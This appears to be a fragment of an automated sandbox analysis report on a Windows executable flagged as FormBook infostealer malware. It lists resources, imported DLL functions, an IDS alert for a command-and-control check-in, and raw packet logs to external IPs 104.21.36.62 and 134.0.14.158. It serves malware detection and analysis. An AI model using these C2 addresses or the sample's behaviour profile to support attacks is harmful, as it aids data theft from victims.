                                                          RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                          RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                          RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                          RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                          RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                          RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                          RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                          RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                          RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                          RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                          RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                          RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                          RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                          RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                          RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                          RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                          RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                          RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                          RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                          RT_RCDATA0xcf7b80x59b77data1.0003292705161384
                                                          RT_GROUP_ICON0x1293300x76dataEnglishGreat Britain0.6610169491525424
                                                          RT_GROUP_ICON0x1293a80x14dataEnglishGreat Britain1.25
                                                          RT_GROUP_ICON0x1293bc0x14dataEnglishGreat Britain1.15
                                                          RT_GROUP_ICON0x1293d00x14dataEnglishGreat Britain1.25
                                                          RT_VERSION0x1293e40xdcdataEnglishGreat Britain0.6181818181818182
                                                          RT_MANIFEST0x1294c00x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                          DLLImport
                                                          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                          PSAPI.DLLGetProcessMemoryInfo
                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                          UxTheme.dllIsThemeActive
                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                          USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishGreat Britain
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2025-01-11T01:40:11.996083+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.549954134.0.14.15880TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 11, 2025 01:39:52.805749893 CET4984380192.168.2.5104.21.36.62
                                                          Jan 11, 2025 01:39:52.810715914 CET8049843104.21.36.62192.168.2.5
                                                          Jan 11, 2025 01:39:52.810828924 CET4984380192.168.2.5104.21.36.62
                                                          Jan 11, 2025 01:39:52.821410894 CET4984380192.168.2.5104.21.36.62
                                                          Jan 11, 2025 01:39:52.826287031 CET8049843104.21.36.62192.168.2.5
                                                          Jan 11, 2025 01:39:53.476918936 CET8049843104.21.36.62192.168.2.5
                                                          Jan 11, 2025 01:39:53.476967096 CET8049843104.21.36.62192.168.2.5
                                                          Jan 11, 2025 01:39:53.477006912 CET8049843104.21.36.62192.168.2.5
                                                          Jan 11, 2025 01:39:53.477174997 CET4984380192.168.2.5104.21.36.62
                                                          Jan 11, 2025 01:39:53.488223076 CET4984380192.168.2.5104.21.36.62
                                                          Jan 11, 2025 01:39:53.493117094 CET8049843104.21.36.62192.168.2.5
                                                          Jan 11, 2025 01:40:08.573889017 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:08.578783035 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:08.579334974 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:08.593410969 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:08.598259926 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.530838013 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.530857086 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.530870914 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.530942917 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.530955076 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.530966043 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.530978918 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.530992031 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.531002998 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.531016111 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.531013966 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.531050920 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.531073093 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.537009954 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.537024975 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.537094116 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.674052000 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.687032938 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.687050104 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.687057972 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.687122107 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.687135935 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.687155962 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.687202930 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.687283039 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.687446117 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.687464952 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.687493086 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.687957048 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.687967062 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.688013077 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.688093901 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.688138008 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.688235044 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.688466072 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.688477039 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.688489914 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.688503027 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.688525915 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.688607931 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.689145088 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.689156055 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.689168930 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.689181089 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.689192057 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.689214945 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.689275026 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.689315081 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.694758892 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.694776058 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.694783926 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.694896936 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.782099009 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.782115936 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.782150030 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.782161951 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.782241106 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.782294035 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.789038897 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.789055109 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.789067030 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.789119005 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.789165020 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.789176941 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.789190054 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.789206028 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.789263010 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.789294004 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.789438009 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.789448977 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.789460897 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.789479017 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.789499998 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.790314913 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.790328026 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.790340900 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.790353060 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.790384054 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.790406942 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:09.790720940 CET8049941134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:09.790764093 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:10.098432064 CET4994180192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:11.115616083 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:11.120533943 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:11.120640993 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:11.134444952 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:11.139369011 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:11.995790005 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:11.995878935 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:11.995891094 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:11.995903969 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:11.995915890 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:11.995928049 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:11.995954037 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:11.996020079 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:11.996033907 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:11.996048927 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:11.996083021 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:11.996139050 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.001015902 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.001032114 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.001044989 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.001056910 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.001086950 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.001121044 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.086316109 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.100058079 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.100123882 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.100136995 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.100150108 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.100162983 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.100174904 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.100187063 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.100244045 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.100492954 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.100512028 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.100523949 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.100536108 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.100548983 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.100553989 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.100575924 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.101375103 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.101393938 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.101407051 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.101418018 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.101419926 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.101430893 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.101437092 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.101464033 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.102123022 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.102221966 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.102241039 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.102252960 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.102262974 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.102263927 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.102279902 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.104924917 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.105010033 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.105012894 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.105026007 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.105068922 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.190833092 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.190875053 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.190995932 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.204555035 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.204607010 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.204619884 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.204632044 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.204643965 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.204655886 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.204668045 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.204725027 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.204770088 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.204869986 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.204881907 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.204895020 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.204905987 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.204917908 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.204921007 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.204938889 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.204961061 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.205205917 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.205250025 CET8049954134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:12.205301046 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:12.653747082 CET4995480192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:13.662288904 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:13.667121887 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:13.667241096 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:13.679163933 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:13.684043884 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:13.684096098 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.509183884 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.509200096 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.509213924 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.509234905 CET8049972134.0.14.158192.168.2.5
